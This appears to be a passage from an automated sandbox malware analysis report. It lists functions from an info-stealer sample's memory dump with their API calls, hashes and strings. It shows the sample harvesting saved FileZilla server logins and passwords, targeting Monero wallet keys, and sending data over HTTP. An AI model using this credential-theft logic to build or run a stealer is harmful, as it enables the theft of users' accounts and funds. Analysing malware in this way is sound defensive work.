                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1fb84debca960272c0f6da860ee28de8fb0002856c228fec649698fb58065195
                                    • Instruction ID: 9607960c87680b77490f8461b34903151530aff5892ec2bf36c21f8ef4dac671
                                    • Opcode Fuzzy Hash: 1fb84debca960272c0f6da860ee28de8fb0002856c228fec649698fb58065195
                                    • Instruction Fuzzy Hash: 66217CA394DB2C9FD20CB9B95C48527BB9DA798650F270339F8C2C7700F65199318693
                                    Function 00C49750 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 00C40250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                      • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                      • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                      • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                      • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                      • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                      • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00C50DBA,00C50DB7,00C50DB6,00C50DB3), ref: 00C40362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C40369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C40385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C403CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C403DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00C40419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C40463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C40562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00C40571
                                    • lstrcat.KERNEL32(?,url: ), ref: 00C40580
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C40593
                                    • lstrcat.KERNEL32(?,00C51678), ref: 00C405A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C405B5
                                    • lstrcat.KERNEL32(?,00C5167C), ref: 00C405C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 00C405D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C405E6
                                    • lstrcat.KERNEL32(?,00C51688), ref: 00C405F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 00C40604
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C40617
                                    • lstrcat.KERNEL32(?,00C51698), ref: 00C40626
                                    • lstrcat.KERNEL32(?,00C5169C), ref: 00C40635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 2cad0b9879bd69af7b338bf906dfacac5deedc22e85b89744e7247b599c3dcd5
                                    • Instruction ID: cc8db71556b5c6d58cd8954a943bd59e179af968721cc3ec84051e86c78e37a0
                                    • Opcode Fuzzy Hash: 2cad0b9879bd69af7b338bf906dfacac5deedc22e85b89744e7247b599c3dcd5
                                    • Instruction Fuzzy Hash: E0D14175940208AFDB04EBF0DD9AEEE7378FF54301F544428F506B6091DE34AA4AEB66
                                    Function 00C35960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                      • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C359F8
                                    • StrCmpCA.SHLWAPI(?,019DE580), ref: 00C35A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C35B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,019DE460,00000000,?,019D9C98,00000000,?,00C51A1C), ref: 00C35E71
                                    • lstrlen.KERNEL32(00000000), ref: 00C35E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00C35E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C35E9A
                                    • lstrlen.KERNEL32(00000000), ref: 00C35EAF
                                    • lstrlen.KERNEL32(00000000), ref: 00C35ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C35EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00C35F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C35F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C35F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00C35FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00C35FBD
                                    • HttpOpenRequestA.WININET(00000000,019DE520,?,019DDC28,00000000,00000000,00400100,00000000), ref: 00C35BF8
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00C35FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 93e79df387191bd7cec30426fcd251d0598ea8d5f7465ccc03027ea0c6ac19ef
                                    • Instruction ID: 3b946cdfe3b9532d809f58bb7fcb21a6690af405d074cbca3e523761e77ff5ad
                                    • Opcode Fuzzy Hash: 93e79df387191bd7cec30426fcd251d0598ea8d5f7465ccc03027ea0c6ac19ef
                                    • Instruction Fuzzy Hash: 5D121E71860118ABEB15EBA0DC95FEEB378FF54700F5041A9F50A72091EF702A89DF65
                                    Function 00C3CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019D9B48,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3CF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C3D0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C3D0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D208
                                    • lstrcat.KERNEL32(?,00C51478), ref: 00C3D217
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D22A
                                    • lstrcat.KERNEL32(?,00C5147C), ref: 00C3D239
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D24C
                                    • lstrcat.KERNEL32(?,00C51480), ref: 00C3D25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D26E
                                    • lstrcat.KERNEL32(?,00C51484), ref: 00C3D27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D290
                                    • lstrcat.KERNEL32(?,00C51488), ref: 00C3D29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D2B2
                                    • lstrcat.KERNEL32(?,00C5148C), ref: 00C3D2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D2D4
                                    • lstrcat.KERNEL32(?,00C51490), ref: 00C3D2E3
                                      • Part of subcall function 00C4A820: lstrlen.KERNEL32(00C34F05,?,?,00C34F05,00C50DDE), ref: 00C4A82B
                                      • Part of subcall function 00C4A820: lstrcpy.KERNEL32(00C50DDE,00000000), ref: 00C4A885
                                    • lstrlen.KERNEL32(?), ref: 00C3D32A
                                    • lstrlen.KERNEL32(?), ref: 00C3D339
                                      • Part of subcall function 00C4AA70: StrCmpCA.SHLWAPI(019D8950,00C3A7A7,?,00C3A7A7,019D8950), ref: 00C4AA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C3D3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: d7c4776633c34db7c334536dc92cb9642523cb9594c60b3b0ce9323bc8cb7ddc
                                    • Instruction ID: 597b9e2062b1357d32b17752a68ebd4feea29081937fc63a088b01a4fff551c1
                                    • Opcode Fuzzy Hash: d7c4776633c34db7c334536dc92cb9642523cb9594c60b3b0ce9323bc8cb7ddc
                                    • Instruction Fuzzy Hash: 7CE14C71950108AFEB08EBA1DD9AEEE7378FF54301F144168F507B6091DF34AA49EB62
                                    Function 00C3C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,019DCA08,00000000,?,00C5144C,00000000,?,?), ref: 00C3CA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C3CA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00C3CA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C3CAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C3CAD9
                                    • StrStrA.SHLWAPI(?,019DCA20,00C50B52), ref: 00C3CAF7
                                    • StrStrA.SHLWAPI(00000000,019DCA68), ref: 00C3CB1E
                                    • StrStrA.SHLWAPI(?,019DD038,00000000,?,00C51458,00000000,?,00000000,00000000,?,019D8940,00000000,?,00C51454,00000000,?), ref: 00C3CCA2
                                    • StrStrA.SHLWAPI(00000000,019DD398), ref: 00C3CCB9
                                      • Part of subcall function 00C3C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C3C871
                                      • Part of subcall function 00C3C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C3C87C
                                    • StrStrA.SHLWAPI(?,019DD398,00000000,?,00C5145C,00000000,?,00000000,019D8820), ref: 00C3CD5A
                                    • StrStrA.SHLWAPI(00000000,019D8B50), ref: 00C3CD71
                                      • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B46), ref: 00C3C943
                                      • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B47), ref: 00C3C957
                                      • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B4E), ref: 00C3C978
                                    • lstrlen.KERNEL32(00000000), ref: 00C3CE44
                                    • CloseHandle.KERNEL32(00000000), ref: 00C3CE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: d207f492f4c4d2d26de7356502b87fd55331ecd1e82ac897184ae20c09bcdd4c
                                    • Instruction ID: aa2e412faa7a1153bb2fb861898d7d5f1f3fd1ec9ff7bd4339f122c1531ab89b
                                    • Opcode Fuzzy Hash: d207f492f4c4d2d26de7356502b87fd55331ecd1e82ac897184ae20c09bcdd4c
                                    • Instruction Fuzzy Hash: 48E1FC71950108AFEB14EBA0DC96FEEB778FF54300F444169F506B6191EF306A8ADB62
                                    Function 00C48320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • RegOpenKeyExA.ADVAPI32(00000000,019DAE20,00000000,00020019,00000000,00C505B6), ref: 00C483A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C48426
                                    • wsprintfA.USER32 ref: 00C48459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C4847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C4848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C48499
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: 26b44ce7e1045f8840a5c56a5a91d38c64286ab64a5d02d3683a91d9e8fbcffd
                                    • Instruction ID: 2ceb71322006e354ce8cb2ac69abd507c3578fcc0e2e5a13591771481cb056e7
                                    • Opcode Fuzzy Hash: 26b44ce7e1045f8840a5c56a5a91d38c64286ab64a5d02d3683a91d9e8fbcffd
